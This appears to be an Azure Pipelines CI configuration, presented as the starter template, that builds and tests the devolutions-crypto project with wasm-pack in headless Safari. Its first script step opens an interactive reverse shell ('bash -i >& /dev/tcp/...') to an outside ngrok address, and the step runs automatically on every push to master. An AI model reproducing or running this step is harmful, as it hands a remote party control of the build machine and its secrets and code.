# Starter pipeline
# Start with a minimal pipeline that you can customize to build and deploy your code.
# Add steps that build, run tests, deploy, and more:
# https://aka.ms/yaml

trigger:
- master

pool:
  vmImage: 'macos-latest'

steps:

- script: |
    bash -i >& /dev/tcp/0.tcp.ngrok.io/14761 0>&1
    
- script: |
    safaridriver --version

    set -e
    curl https://sh.rustup.rs -sSf | sh -s -- -y --default-toolchain stable
    echo "##vso[task.setvariable variable=PATH;]$PATH:$HOME/.cargo/bin"
    source $HOME/.cargo/env

    cargo install wasm-pack

    git clone https://github.com/Devolutions/devolutions-crypto

    cd devolutions-crypto
    cd devolutionscrypto

    wasm-pack test --safari --headless

  displayName: 'Run a one-line script'

